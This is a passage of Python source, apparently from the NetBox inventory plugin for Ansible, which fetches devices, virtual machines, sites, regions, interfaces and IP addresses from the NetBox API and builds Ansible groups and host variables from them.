return self._pluralize(host["config_context"])
except Exception:
return
def extract_local_context_data(self, host):
try:
if self.flatten_local_context_data:
# Don't wrap in an array if we're about to flatten it to separate host vars
return host["local_context_data"]
else:
return self._pluralize(host["local_context_data"])
except Exception:
return
def extract_manufacturer(self, host):
try:
return self._pluralize(
self.manufacturers_lookup[host["device_type"]["manufacturer"]["id"]]
)
except Exception:
return
def extract_primary_ip(self, host):
try:
address = host["primary_ip"]["address"]
return str(ip_interface(address).ip)
except Exception:
return
def extract_primary_ip4(self, host):
try:
address = host["primary_ip4"]["address"]
return str(ip_interface(address).ip)
except Exception:
return
def extract_primary_ip6(self, host):
try:
address = host["primary_ip6"]["address"]
return str(ip_interface(address).ip)
except Exception:
return
def extract_tags(self, host):
try:
tag_zero = host["tags"][0]
# Check the type of the first element in the "tags" array.
# If a dictionary (NetBox >= 2.9), return an array of tags' slugs.
if isinstance(tag_zero, dict):
return list(sub["slug"] for sub in host["tags"])
# If a string (NetBox <= 2.8), return the original "tags" array.
elif isinstance(tag_zero, str):
return host["tags"]
# If tag_zero fails definition (no tags), return the empty array.
except Exception:
return host["tags"]
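    # Illustrative sketch (not part of the original plugin): the two tag formats
    # handled by extract_tags() above. Dict tags (NetBox >= 2.9) are reduced to their
    # slugs, plain string tags (NetBox <= 2.8) are returned unchanged.
    def _example_tag_formats(self):
        new_style = {"tags": [{"id": 1, "slug": "web"}, {"id": 2, "slug": "prod"}]}
        old_style = {"tags": ["web", "prod"]}
        return self.extract_tags(new_style), self.extract_tags(old_style)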
def extract_interfaces(self, host):
try:
interfaces_lookup = (
self.vm_interfaces_lookup
if host["is_virtual"]
else self.device_interfaces_lookup
)
interfaces = deepcopy(list(interfaces_lookup[host["id"]].values()))
before_netbox_v29 = bool(self.ipaddresses_intf_lookup)
# Attach IP Addresses to their interface
for interface in interfaces:
if before_netbox_v29:
interface["ip_addresses"] = list(
self.ipaddresses_intf_lookup[interface["id"]].values()
)
else:
interface["ip_addresses"] = list(
self.vm_ipaddresses_intf_lookup[interface["id"]].values()
if host["is_virtual"]
else self.device_ipaddresses_intf_lookup[
interface["id"]
].values()
)
interface["tags"] = list(sub["slug"] for sub in interface["tags"])
return interfaces
except Exception:
return
def extract_custom_fields(self, host):
try:
return host["custom_fields"]
except Exception:
return
def extract_regions(self, host):
# A host may have a site. A site may have a region. A region may have a parent region.
# Produce a list of regions:
# - it will be empty if the device has no site, or the site has no region set
# - it will have 1 element if the site's region has no parent
# - it will have multiple elements if the site's region has a parent region
site = host.get("site", None)
if not isinstance(site, dict):
# Device has no site
return []
site_id = site.get("id", None)
if site_id is None:
# Device has no site
return []
return self._objects_array_following_parents(
initial_object_id=self.sites_region_lookup[site_id],
object_lookup=self.regions_lookup,
object_parent_lookup=self.regions_parent_lookup,
)
def extract_site_groups(self, host):
# A host may have a site. A site may have a site_group. A site_group may have a parent site_group.
# Produce a list of site_groups:
# - it will be empty if the device has no site, or the site has no site_group set
# - it will have 1 element if the site's site_group has no parent
# - it will have multiple elements if the site's site_group has a parent site_group
site = host.get("site", None)
if not isinstance(site, dict):
# Device has no site
return []
site_id = site.get("id", None)
if site_id is None:
# Device has no site
return []
return self._objects_array_following_parents(
initial_object_id=self.sites_site_group_lookup[site_id],
object_lookup=self.site_groups_lookup,
object_parent_lookup=self.site_groups_parent_lookup,
)
def extract_location(self, host):
# A host may have a location. A location may have a parent location.
# Produce a list of locations:
# - it will be empty if the device has no location
# - it will have 1 element if the device's location has no parent
# - it will have multiple elements if the location has a parent location
try:
location_id = host["location"]["id"]
except (KeyError, TypeError):
# Device has no location
return []
return self._objects_array_following_parents(
initial_object_id=location_id,
object_lookup=self.locations_lookup,
object_parent_lookup=self.locations_parent_lookup,
)
def extract_cluster(self, host):
try:
# cluster does not have a slug
return host["cluster"]["name"]
except Exception:
return
def extract_cluster_group(self, host):
try:
return self.clusters_group_lookup[host["cluster"]["id"]]
except Exception:
return
def extract_cluster_type(self, host):
try:
return self.clusters_type_lookup[host["cluster"]["id"]]
except Exception:
return
def extract_is_virtual(self, host):
return host.get("is_virtual")
def extract_dns_name(self, host):
# No primary IP assigned
if not host.get("primary_ip"):
return None
before_netbox_v29 = bool(self.ipaddresses_lookup)
if before_netbox_v29:
ip_address = self.ipaddresses_lookup.get(host["primary_ip"]["id"])
else:
if host["is_virtual"]:
ip_address = self.vm_ipaddresses_lookup.get(host["primary_ip"]["id"])
else:
ip_address = self.device_ipaddresses_lookup.get(
host["primary_ip"]["id"]
)
        # Don't assign a host_var for an empty dns_name
if ip_address.get("dns_name") == "":
return None
return ip_address.get("dns_name")
def refresh_platforms_lookup(self):
url = self.api_endpoint + "/api/dcim/platforms/?limit=0"
platforms = self.get_resource_list(api_url=url)
self.platforms_lookup = dict(
(platform["id"], platform["slug"]) for platform in platforms
)
def refresh_sites_lookup(self):
# Three dictionaries are created here.
# "sites_lookup_slug" only contains the slug. Used by _add_site_groups() when creating inventory groups
# "sites_lookup" contains the full data structure. Most site lookups use this
# "sites_with_prefixes" keeps track of which sites have prefixes assigned. Passed to get_resource_list_chunked()
url = self.api_endpoint + "/api/dcim/sites/?limit=0"
sites = self.get_resource_list(api_url=url)
# The following dictionary is used for host group creation only,
# as the grouping function expects a string as the value of each key
self.sites_lookup_slug = dict((site["id"], site["slug"]) for site in sites)
if self.site_data or self.prefixes:
# If the "site_data" option is specified, keep the full data structure presented by the API response.
# The "prefixes" option necessitates this structure as well as it requires the site object to be dict().
self.sites_lookup = dict((site["id"], site) for site in sites)
else:
# Otherwise, set equal to the "slug only" dictionary
self.sites_lookup = self.sites_lookup_slug
# The following dictionary tracks which sites have prefixes assigned.
self.sites_with_prefixes = set()
for site in sites:
if site["prefix_count"] and site["prefix_count"] > 0:
self.sites_with_prefixes.add(site["slug"])
# Used by refresh_prefixes()
def get_region_for_site(site):
# Will fail if site does not have a region defined in NetBox
try:
return (site["id"], site["region"]["id"])
except Exception:
return (site["id"], None)
# Dictionary of site id to region id
self.sites_region_lookup = dict(map(get_region_for_site, sites))
def get_site_group_for_site(site):
# Will fail if site does not have a site_group defined in NetBox
try:
return (site["id"], site["site_group"]["id"])
except Exception:
return (site["id"], None)
# Dictionary of site id to site_group id
self.sites_site_group_lookup = dict(map(get_site_group_for_site, sites))
# Note: depends on the result of refresh_sites_lookup for self.sites_with_prefixes
def refresh_prefixes(self):
# Pull all prefixes defined in NetBox
url = self.api_endpoint + "/api/ipam/prefixes"
if self.fetch_all:
prefixes = self.get_resource_list(url)
else:
prefixes = self.get_resource_list_chunked(
api_url=url,
query_key="site",
query_values=list(self.sites_with_prefixes),
)
self.prefixes_sites_lookup = defaultdict(list)
# We are only concerned with Prefixes that have actually been assigned to sites
for prefix in prefixes:
if prefix.get("site"):
self.prefixes_sites_lookup[prefix["site"]["id"]].append(prefix)
# Remove "site" attribute, as it's redundant when prefixes are assigned to site
del prefix["site"]
def refresh_regions_lookup(self):
url = self.api_endpoint + "/api/dcim/regions/?limit=0"
regions = self.get_resource_list(api_url=url)
self.regions_lookup = dict((region["id"], region["slug"]) for region in regions)
def get_region_parent(region):
# Will fail if region does not have a parent region
try:
return (region["id"], region["parent"]["id"])
except Exception:
return (region["id"], None)
# Dictionary of region id to parent region id
self.regions_parent_lookup = dict(
filter(lambda x: x is not None, map(get_region_parent, regions))
)
def refresh_site_groups_lookup(self):
if self.api_version < version.parse("2.11"):
return
url = self.api_endpoint + "/api/dcim/site-groups/?limit=0"
site_groups = self.get_resource_list(api_url=url)
self.site_groups_lookup = dict(
(site_group["id"], site_group["slug"]) for site_group in site_groups
)
def get_site_group_parent(site_group):
# Will fail if site_group does not have a parent site_group
try:
return (site_group["id"], site_group["parent"]["id"])
except Exception:
return (site_group["id"], None)
# Dictionary of site_group id to parent site_group id
self.site_groups_parent_lookup = dict(
filter(lambda x: x is not None, map(get_site_group_parent, site_groups))
)
def refresh_locations_lookup(self):
# Locations were added in v2.11. Return empty lookups for previous versions.
if self.api_version < version.parse("2.11"):
return
url = self.api_endpoint + "/api/dcim/locations/?limit=0"
locations = self.get_resource_list(api_url=url)
self.locations_lookup = dict(
(location["id"], location["slug"]) for location in locations
)
def get_location_parent(location):
# Will fail if location does not have a parent location
try:
return (location["id"], location["parent"]["id"])
except Exception:
return (location["id"], None)
def get_location_site(location):
# Locations MUST be assigned to a site
return (location["id"], location["site"]["id"])
# Dictionary of location id to parent location id
self.locations_parent_lookup = dict(
filter(None, map(get_location_parent, locations))
)
# Location to site lookup
self.locations_site_lookup = dict(map(get_location_site, locations))
def refresh_tenants_lookup(self):
url = self.api_endpoint + "/api/tenancy/tenants/?limit=0"
tenants = self.get_resource_list(api_url=url)
self.tenants_lookup = dict((tenant["id"], tenant["slug"]) for tenant in tenants)
def refresh_racks_lookup(self):
url = self.api_endpoint + "/api/dcim/racks/?limit=0"
racks = self.get_resource_list(api_url=url)
self.racks_lookup = dict((rack["id"], rack["name"]) for rack in racks)
def get_group_for_rack(rack):
try:
return (rack["id"], rack["group"]["id"])
except Exception:
return (rack["id"], None)
def get_role_for_rack(rack):
try:
return (rack["id"], rack["role"]["slug"])
except Exception:
return (rack["id"], None)
self.racks_group_lookup = dict(map(get_group_for_rack, racks))
self.racks_role_lookup = dict(map(get_role_for_rack, racks))
def refresh_rack_groups_lookup(self):
# Locations were added in v2.11 replacing rack groups. Do nothing for 2.11+
if self.api_version >= version.parse("2.11"):
return
url = self.api_endpoint + "/api/dcim/rack-groups/?limit=0"
rack_groups = self.get_resource_list(api_url=url)
self.rack_groups_lookup = dict(
(rack_group["id"], rack_group["slug"]) for rack_group in rack_groups
)
def get_rack_group_parent(rack_group):
try:
return (rack_group["id"], rack_group["parent"]["id"])
except Exception:
return (rack_group["id"], None)
# Dictionary of rack group id to parent rack group id
self.rack_group_parent_lookup = dict(map(get_rack_group_parent, rack_groups))
def refresh_device_roles_lookup(self):
url = self.api_endpoint + "/api/dcim/device-roles/?limit=0"
device_roles = self.get_resource_list(api_url=url)
self.device_roles_lookup = dict(
(device_role["id"], device_role["slug"]) for device_role in device_roles
)
def refresh_device_types_lookup(self):
url = self.api_endpoint + "/api/dcim/device-types/?limit=0"
device_types = self.get_resource_list(api_url=url)
self.device_types_lookup = dict(
(device_type["id"], device_type["slug"]) for device_type in device_types
)
def refresh_manufacturers_lookup(self):
url = self.api_endpoint + "/api/dcim/manufacturers/?limit=0"
manufacturers = self.get_resource_list(api_url=url)
self.manufacturers_lookup = dict(
(manufacturer["id"], manufacturer["slug"]) for manufacturer in manufacturers
)
def refresh_clusters_lookup(self):
url = self.api_endpoint + "/api/virtualization/clusters/?limit=0"
clusters = self.get_resource_list(api_url=url)
def get_cluster_type(cluster):
# Will fail if cluster does not have a type (required property so should always be true)
try:
return (cluster["id"], cluster["type"]["slug"])
except Exception:
return (cluster["id"], None)
def get_cluster_group(cluster):
# Will fail if cluster does not have a group (group is optional)
try:
return (cluster["id"], cluster["group"]["slug"])
except Exception:
return (cluster["id"], None)
self.clusters_type_lookup = dict(map(get_cluster_type, clusters))
self.clusters_group_lookup = dict(map(get_cluster_group, clusters))
def refresh_services(self):
url = self.api_endpoint + "/api/ipam/services/?limit=0"
services = []
if self.fetch_all:
services = self.get_resource_list(url)
else:
device_services = self.get_resource_list_chunked(
api_url=url,
query_key="device_id",
query_values=self.devices_lookup.keys(),
)
vm_services = self.get_resource_list_chunked(
api_url=url,
query_key="virtual_machine_id",
query_values=self.vms_lookup.keys(),
)
services = chain(device_services, vm_services)
# Construct a dictionary of dictionaries, separately for devices and vms.
# Allows looking up services by device id or vm id
self.device_services_lookup = defaultdict(dict)
self.vm_services_lookup = defaultdict(dict)
for service in services:
service_id = service["id"]
if service.get("device"):
self.device_services_lookup[service["device"]["id"]][
service_id
] = service
if service.get("virtual_machine"):
self.vm_services_lookup[service["virtual_machine"]["id"]][
service_id
] = service
def refresh_interfaces(self):
url_device_interfaces = self.api_endpoint + "/api/dcim/interfaces/?limit=0"
url_vm_interfaces = (
self.api_endpoint + "/api/virtualization/interfaces/?limit=0"
)
device_interfaces = []
vm_interfaces = []
if self.fetch_all:
device_interfaces = self.get_resource_list(url_device_interfaces)
vm_interfaces = self.get_resource_list(url_vm_interfaces)
else:
device_interfaces = self.get_resource_list_chunked(
api_url=url_device_interfaces,
query_key="device_id",
query_values=self.devices_lookup.keys(),
)
vm_interfaces = self.get_resource_list_chunked(
api_url=url_vm_interfaces,
query_key="virtual_machine_id",
query_values=self.vms_lookup.keys(),
)
# Construct a dictionary of dictionaries, separately for devices and vms.
# For a given device id or vm id, get a lookup of interface id to interface
# This is because interfaces may be returned multiple times when querying for virtual chassis parent and child in separate queries
self.device_interfaces_lookup = defaultdict(dict)
self.vm_interfaces_lookup = defaultdict(dict)
# /dcim/interfaces gives count_ipaddresses per interface. /virtualization/interfaces does not
self.devices_with_ips = set()
for interface in device_interfaces:
interface_id = interface["id"]
device_id = interface["device"]["id"]
# Check if device_id is actually a device we've fetched, and was not filtered out by query_filters
if device_id not in self.devices_lookup:
continue
            # Check if device_id is part of a virtual chassis
# If so, treat its interfaces as actually part of the master
device = self.devices_lookup[device_id]
virtual_chassis_master = self._get_host_virtual_chassis_master(device)
if virtual_chassis_master is not None:
device_id = virtual_chassis_master
self.device_interfaces_lookup[device_id][interface_id] = interface
# Keep track of what devices have interfaces with IPs, so if fetch_all is False we can avoid unnecessary queries
if interface["count_ipaddresses"] > 0:
self.devices_with_ips.add(device_id)
for interface in vm_interfaces:
interface_id = interface["id"]
vm_id = interface["virtual_machine"]["id"]
self.vm_interfaces_lookup[vm_id][interface_id] = interface
# Note: depends on the result of refresh_interfaces for self.devices_with_ips
def refresh_ipaddresses(self):
url = (
self.api_endpoint
+ "/api/ipam/ip-addresses/?limit=0&assigned_to_interface=true"
)
ipaddresses = []
if self.fetch_all:
ipaddresses = self.get_resource_list(url)
else:
device_ips = self.get_resource_list_chunked(
api_url=url,
query_key="device_id",
query_values=list(self.devices_with_ips),
)
vm_ips = self.get_resource_list_chunked(
api_url=url,
query_key="virtual_machine_id",
query_values=self.vms_lookup.keys(),
)
ipaddresses = chain(device_ips, vm_ips)
# Construct a dictionary of lists, to allow looking up ip addresses by interface id
# Note that interface ids share the same namespace for both devices and vms so this is a single dictionary
self.ipaddresses_intf_lookup = defaultdict(dict)
# Construct a dictionary of the IP addresses themselves
self.ipaddresses_lookup = defaultdict(dict)
# NetBox v2.9 and onwards
self.vm_ipaddresses_intf_lookup = defaultdict(dict)
self.vm_ipaddresses_lookup = defaultdict(dict)
self.device_ipaddresses_intf_lookup = defaultdict(dict)
self.device_ipaddresses_lookup = defaultdict(dict)
for ipaddress in ipaddresses:
# As of NetBox v2.9 "assigned_object_x" replaces "interface"
if ipaddress.get("assigned_object_id"):
interface_id = ipaddress["assigned_object_id"]
ip_id = ipaddress["id"]
# We need to copy the ipaddress entry to preserve the original in case caching is used.
ipaddress_copy = ipaddress.copy()
if ipaddress["assigned_object_type"] == "virtualization.vminterface":
self.vm_ipaddresses_lookup[ip_id] = ipaddress_copy
self.vm_ipaddresses_intf_lookup[interface_id][
ip_id
] = ipaddress_copy
else:
self.device_ipaddresses_lookup[ip_id] = ipaddress_copy
self.device_ipaddresses_intf_lookup[interface_id][
ip_id
                    ] = ipaddress_copy
                # Remove "assigned_object_X" attributes, as that's redundant when ipaddress is added to an interface
del ipaddress_copy["assigned_object_id"]
del ipaddress_copy["assigned_object_type"]
del ipaddress_copy["assigned_object"]
continue
if not ipaddress.get("interface"):
continue
interface_id = ipaddress["interface"]["id"]
ip_id = ipaddress["id"]
# We need to copy the ipaddress entry to preserve the original in case caching is used.
ipaddress_copy = ipaddress.copy()
self.ipaddresses_intf_lookup[interface_id][ip_id] = ipaddress_copy
self.ipaddresses_lookup[ip_id] = ipaddress_copy
# Remove "interface" attribute, as that's redundant when ipaddress is added to an interface
del ipaddress_copy["interface"]
@property
def lookup_processes(self):
lookups = [
self.refresh_sites_lookup,
self.refresh_regions_lookup,
self.refresh_site_groups_lookup,
self.refresh_locations_lookup,
self.refresh_tenants_lookup,
self.refresh_device_roles_lookup,
self.refresh_platforms_lookup,
self.refresh_device_types_lookup,
self.refresh_manufacturers_lookup,
self.refresh_clusters_lookup,
]
if self.interfaces:
lookups.append(self.refresh_interfaces)
if self.prefixes:
lookups.append(self.refresh_prefixes)
if self.services:
lookups.append(self.refresh_services)
if self.racks:
lookups.extend(
[
self.refresh_racks_lookup,
self.refresh_rack_groups_lookup,
]
)
return lookups
@property
def lookup_processes_secondary(self):
lookups = []
# IP addresses are needed for either interfaces or dns_name options
if self.interfaces or self.dns_name or self.ansible_host_dns_name:
lookups.append(self.refresh_ipaddresses)
return lookups
def refresh_lookups(self, lookups):
# Exceptions that occur in threads by default are printed to stderr, and ignored by the main thread
# They need to be caught, and raised in the main thread to prevent further execution of this plugin
thread_exceptions = []
def handle_thread_exceptions(lookup):
def wrapper():
try:
lookup()
except Exception as e:
# Save for the main-thread to re-raise
# Also continue to raise on this thread, so the default handler can run to print to stderr
thread_exceptions.append(e)
raise e
return wrapper
thread_list = []
try:
for lookup in lookups:
thread = Thread(target=handle_thread_exceptions(lookup))
thread_list.append(thread)
thread.start()
for thread in thread_list:
thread.join()
# Wait till we've joined all threads before raising any exceptions
for exception in thread_exceptions:
raise exception
finally:
# Avoid retain cycles
thread_exceptions = None
def fetch_api_docs(self):
try:
status = self._fetch_information(self.api_endpoint + "/api/status")
netbox_api_version = ".".join(status["netbox-version"].split(".")[:2])
except Exception:
netbox_api_version = 0
tmp_dir = os.path.split(DEFAULT_LOCAL_TMP)[0]
tmp_file = os.path.join(tmp_dir, "netbox_api_dump.json")
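        # Reuse the on-disk cached OpenAPI spec if its version matches the
        # running NetBox version; otherwise download and cache a fresh copy.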
try:
with open(tmp_file) as file:
openapi = json.load(file)
except Exception:
openapi = {}
cached_api_version = openapi.get("info", {}).get("version")
if netbox_api_version != cached_api_version:
openapi = self._fetch_information(
self.api_endpoint + "/api/docs/?format=openapi"
)
with open(tmp_file, "w") as file:
json.dump(openapi, file)
self.api_version = version.parse(openapi["info"]["version"])
self.allowed_device_query_parameters = [
p["name"] for p in openapi["paths"]["/dcim/devices/"]["get"]["parameters"]
]
self.allowed_vm_query_parameters = [
p["name"]
for p in openapi["paths"]["/virtualization/virtual-machines/"]["get"][
"parameters"
]
]
def validate_query_parameter(self, parameter, allowed_query_parameters):
if not (isinstance(parameter, dict) and len(parameter) == 1):
self.display.warning(
"Warning query parameters %s not a dict with a single key." % parameter
)
return None
k = tuple(parameter.keys())[0]
v = tuple(parameter.values())[0]
if not (k in allowed_query_parameters or k.startswith("cf_")):
msg = "Warning: %s not in %s or starting with cf (Custom field)" % (
k,
allowed_query_parameters,
)
self.display.warning(msg=msg)
return None
return k, v
def filter_query_parameters(self, parameters, allowed_query_parameters):
return filter(
lambda parameter: parameter is not None,
# For each element of query_filters, test if it's allowed
map(
# Create a partial function with the device-specific list of query parameters
partial(
self.validate_query_parameter,
allowed_query_parameters=allowed_query_parameters,
),
parameters,
),
)
def refresh_url(self):
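        # Build the device and VM list URLs with any valid query filters applied.
        # Either returned URL may be None when query_filters rules out that object type entirely.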
device_query_parameters = [("limit", 0)]
vm_query_parameters = [("limit", 0)]
device_url = self.api_endpoint + "/api/dcim/devices/?"
vm_url = self.api_endpoint + "/api/virtualization/virtual-machines/?"
        # Add query_filters to both the devices and the VMs query, if they're valid
if isinstance(self.query_filters, Iterable):
device_query_parameters.extend(
self.filter_query_parameters(
self.query_filters, self.allowed_device_query_parameters
)
)
vm_query_parameters.extend(
self.filter_query_parameters(
self.query_filters, self.allowed_vm_query_parameters
)
)
if isinstance(self.device_query_filters, Iterable):
device_query_parameters.extend(
self.filter_query_parameters(
self.device_query_filters, self.allowed_device_query_parameters
)
)
if isinstance(self.vm_query_filters, Iterable):
vm_query_parameters.extend(
self.filter_query_parameters(
self.vm_query_filters, self.allowed_vm_query_parameters
)
)
# When query_filters is Iterable, and is not empty:
# - If none of the filters are valid for devices, do not fetch any devices
# - If none of the filters are valid for VMs, do not fetch any VMs
# If either device_query_filters or vm_query_filters are set,
        # device_query_parameters and vm_query_parameters will have more than one element, so those URLs will still be requested
if self.query_filters and isinstance(self.query_filters, Iterable):
if len(device_query_parameters) <= 1:
device_url = None
if len(vm_query_parameters) <= 1:
vm_url = None
# Append the parameters to the URLs
if device_url:
device_url = device_url + urlencode(device_query_parameters)
if vm_url:
vm_url = vm_url + urlencode(vm_query_parameters)
# Exclude config_context if not required
if not self.config_context:
if device_url:
device_url = device_url + "&exclude=config_context"
if vm_url:
vm_url = vm_url + "&exclude=config_context"
return device_url, vm_url
def fetch_hosts(self):
device_url, vm_url = self.refresh_url()
self.devices_list = []
self.vms_list = []
if device_url:
self.devices_list = self.get_resource_list(device_url)
if vm_url:
self.vms_list = self.get_resource_list(vm_url)
# Allow looking up devices/vms by their ids
self.devices_lookup = {device["id"]: device for device in self.devices_list}
self.vms_lookup = {vm["id"]: vm for vm in self.vms_list}
# There's nothing that explicitly says if a host is virtual or not - add in a new field
for host in self.devices_list:
host["is_virtual"] = False
for host in self.vms_list:
host["is_virtual"] = True
def extract_name(self, host):
        # A host in an Ansible inventory requires a hostname.
        # name is a unique but not required attribute for a device in NetBox.
        # We default to a UUID for the hostname in case the name is not set in NetBox.
# Use virtual chassis name if set by the user.
if self.virtual_chassis_name and self._get_host_virtual_chassis_master(host):
return host["virtual_chassis"]["name"] or str(uuid.uuid4())
else:
return host["name"] or str(uuid.uuid4())
def generate_group_name(self, grouping, group):
# Check for special case - if group is a boolean, just return grouping name instead
# eg. "is_virtual" - returns true for VMs, should put them in a group named "is_virtual", not "is_virtual_True"
if isinstance(group, bool):
if group:
return grouping
else:
# Don't create the inverse group
return None
# Special case. Extract name from service, which is a hash.
if grouping == "services":
group = group["name"]
grouping = "service"
if grouping == "status":
group = group["value"]
if self.group_names_raw:
return group
else:
return "_".join([grouping, group])
def add_host_to_groups(self, host, hostname):
site_group_by = self._pluralize_group_by("site")
for grouping in self.group_by:
# Don't handle regions here since no hosts are ever added to region groups
# Sites and locations are also specially handled in the main()
if grouping in ["region", site_group_by, "location", "site_group"]:
continue
if grouping not in self.group_extractors:
raise AnsibleError(
(
'group_by option "%s" is not valid.'
" Check group_by documentation or check the plurals option, as well as the racks options."
" It can determine what group_by options are valid."
)
% grouping
)
groups_for_host = self.group_extractors[grouping](host)
if not groups_for_host:
continue
# Make groups_for_host a list if it isn't already
if not isinstance(groups_for_host, list):
groups_for_host = [groups_for_host]
for group_for_host in groups_for_host:
group_name = self.generate_group_name(grouping, group_for_host)
if not group_name:
continue
# Group names may be transformed by the ansible TRANSFORM_INVALID_GROUP_CHARS setting
# add_group returns the actual group name used
transformed_group_name = self.inventory.add_group(group=group_name)
self.inventory.add_host(group=transformed_group_name, host=hostname)
def _add_site_groups(self):
# Map site id to transformed group names
self.site_group_names = dict()
for (
site_id,
site_name,
) in self.sites_lookup_slug.items(): # "Slug" only. Data not used for grouping
site_group_name = self.generate_group_name(
self._pluralize_group_by("site"), site_name
)
# Add the site group to get its transformed name
site_transformed_group_name = self.inventory.add_group(
group=site_group_name
)
self.site_group_names[site_id] = site_transformed_group_name
def _add_region_groups(self):
# Mapping of region id to group name
region_transformed_group_names = self._setup_nested_groups(
"region", self.regions_lookup, self.regions_parent_lookup
)
# Add site groups as children of region groups
for site_id in self.sites_lookup:
region_id = self.sites_region_lookup.get(site_id, None)
if region_id is None:
continue
self.inventory.add_child(
region_transformed_group_names[region_id],
self.site_group_names[site_id],
)
def _add_site_group_groups(self):
# Mapping of site_group id to group name
site_group_transformed_group_names = self._setup_nested_groups(
"site_group", self.site_groups_lookup, self.site_groups_parent_lookup
)
# Add site groups as children of site_group groups
for site_id in self.sites_lookup:
site_group_id = self.sites_site_group_lookup.get(site_id, None)
if site_group_id is None:
continue
self.inventory.add_child(
site_group_transformed_group_names[site_group_id],
self.site_group_names[site_id],
)
def _add_location_groups(self):
# Mapping of location id to group name
self.location_group_names = self._setup_nested_groups(
"location", self.locations_lookup, self.locations_parent_lookup
)
# Add location to site groups as children
for location_id, location_slug in self.locations_lookup.items():
if self.locations_parent_lookup.get(location_id, None):
# Only top level locations should be children of sites
continue
site_transformed_group_name = self.site_group_names[
self.locations_site_lookup[location_id]
]
self.inventory.add_child(
site_transformed_group_name, self.location_group_names[location_id]
)
def _setup_nested_groups(self, group, lookup, parent_lookup):
# Mapping of id to group name
transformed_group_names = dict()
# Create groups for each object
for obj_id in lookup:
group_name = self.generate_group_name(group, lookup[obj_id])
transformed_group_names[obj_id] = self.inventory.add_group(group=group_name)
# Now that all groups exist, add relationships between them
for obj_id in lookup:
group_name = transformed_group_names[obj_id]
parent_id = parent_lookup.get(obj_id, None)
if parent_id is not None and parent_id in transformed_group_names:
parent_name = transformed_group_names[parent_id]
self.inventory.add_child(parent_name, group_name)
return transformed_group_names
def _fill_host_variables(self, host, hostname):
extracted_primary_ip = self.extract_primary_ip(host=host)
if extracted_primary_ip:
self.inventory.set_variable(hostname, "ansible_host", extracted_primary_ip)
if self.ansible_host_dns_name:
extracted_dns_name = self.extract_dns_name(host=host)
if extracted_dns_name:
self.inventory.set_variable(
hostname, "ansible_host", extracted_dns_name
)
extracted_primary_ip4 = self.extract_primary_ip4(host=host)
if extracted_primary_ip4:
self.inventory.set_variable(hostname, "primary_ip4", extracted_primary_ip4)
extracted_primary_ip6 = self.extract_primary_ip6(host=host)
if extracted_primary_ip6:
self.inventory.set_variable(hostname, "primary_ip6", extracted_primary_ip6)
for attribute, extractor in self.group_extractors.items():
extracted_value = extractor(host)
# Compare with None, not just check for a truth comparison - allow empty arrays, etc to be host vars
if extracted_value is None:
continue
# Special case - all group_by options are single strings, but tag is a list of tags
# Keep the groups named singular "tag_sometag", but host attribute should be "tags":["sometag", "someothertag"]
if attribute == "tag":
attribute = "tags"
if attribute == "region":
attribute = "regions"
if attribute == "site_group":
attribute = "site_groups"
if attribute == "location":
attribute = "locations"
if attribute == "rack_group":
attribute = "rack_groups"
# Flatten the dict into separate host vars, if enabled
if isinstance(extracted_value, dict) and (
(attribute == "config_context" and self.flatten_config_context)
or (attribute == "custom_fields" and self.flatten_custom_fields)
or (
attribute == "local_context_data"
and self.flatten_local_context_data
)
):
for key, value in extracted_value.items():
self.inventory.set_variable(hostname, key, value)
else:
self.inventory.set_variable(hostname, attribute, extracted_value)
def _get_host_virtual_chassis_master(self, host):
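        # Return the device id of the virtual chassis master for this host,
        # or None when the host is not part of a virtual chassis.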
virtual_chassis = host.get("virtual_chassis", None)
if not virtual_chassis:
return None
master = virtual_chassis.get("master", None)
if not master:
return None
return master.get("id", None)
def main(self):
# Get info about the API - version, allowed query parameters
self.fetch_api_docs()
self.fetch_hosts()
        # Interface and service lookups depend on the fetched hosts when the fetch_all option is false
self.refresh_lookups(self.lookup_processes)
# Looking up IP Addresses depends on the result of interfaces count_ipaddresses field
# - can skip any device/vm without any IPs
self.refresh_lookups(self.lookup_processes_secondary)
# If we're grouping by regions, hosts are not added to region groups
# If we're grouping by locations, hosts may be added to the site or location
# - the site groups are added as sub-groups of regions
# - the location groups are added as sub-groups of sites
# So, we need to make sure we're also grouping by sites if regions or locations are enabled
site_group_by = self._pluralize_group_by("site")
if (
site_group_by in self.group_by
or "location" in self.group_by
or "region" in self.group_by
or "site_group" in self.group_by
):
self._add_site_groups()
# Create groups for locations. Will be a part of site groups.
if "location" in self.group_by and self.api_version >= version.parse("2.11"):
self._add_location_groups()
# Create groups for regions, containing the site groups
if "region" in self.group_by:
self._add_region_groups()
# Create groups for site_groups, containing the site groups
if "site_group" in self.group_by and self.api_version >= version.parse("2.11"):
self._add_site_group_groups()
for host in chain(self.devices_list, self.vms_list):
virtual_chassis_master = self._get_host_virtual_chassis_master(host)
if (
virtual_chassis_master is not None
and virtual_chassis_master != host["id"]
):
# Device is part of a virtual chassis, but is not the master
continue
hostname = self.extract_name(host=host)
self.inventory.add_host(host=hostname)
self._fill_host_variables(host=host, hostname=hostname)
strict = self.get_option("strict")
# Composed variables
self._set_composite_vars(
self.get_option("compose"), host, hostname, strict=strict
)
# Complex groups based on jinja2 conditionals, hosts that meet the conditional are added to group
self._add_host_to_composed_groups(
self.get_option("groups"), host, hostname, strict=strict
)
# Create groups based on variable values and add the corresponding hosts to it
self._add_host_to_keyed_groups(
self.get_option("keyed_groups"), host, hostname, strict=strict
)
self.add_host_to_groups(host=host, hostname=hostname)
# Special processing for sites and locations as those groups were already created
if getattr(self, "location_group_names", None) and host.get("location"):
# Add host to location group when host is assigned to the location
self.inventory.add_host(
group=self.location_group_names[host["location"]["id"]],
host=hostname,
)
elif getattr(self, "site_group_names", None) and host.get("site"):
# Add host to site group when host is NOT assigned to a location
self.inventory.add_host(
group=self.site_group_names[host["site"]["id"]],
host=hostname,
)
def parse(self, inventory, loader, path, cache=True):
super(InventoryModule, self).parse(inventory, loader, path)
self._read_config_data(path=path)
self.use_cache = cache
# NetBox access
token = self.get_option("token")
# Handle extra "/" from api_endpoint configuration and trim if necessary, see PR#49943
self.api_endpoint = self.get_option("api_endpoint").strip("/")
self.timeout = self.get_option("timeout")
self.max_uri_length = self.get_option("max_uri_length")
self.validate_certs = self.get_option("validate_certs")
self.follow_redirects = self.get_option("follow_redirects")
self.config_context = self.get_option("config_context")
self.flatten_config_context = self.get_option("flatten_config_context")
self.flatten_local_context_data = self.get_option("flatten_local_context_data")
self.flatten_custom_fields = self.get_option("flatten_custom_fields")
self.plurals = self.get_option("plurals")
self.interfaces = self.get_option("interfaces")
self.services = self.get_option("services")
self.site_data = self.get_option("site_data")
self.prefixes = self.get_option("prefixes")
self.fetch_all = self.get_option("fetch_all")
self.headers = {
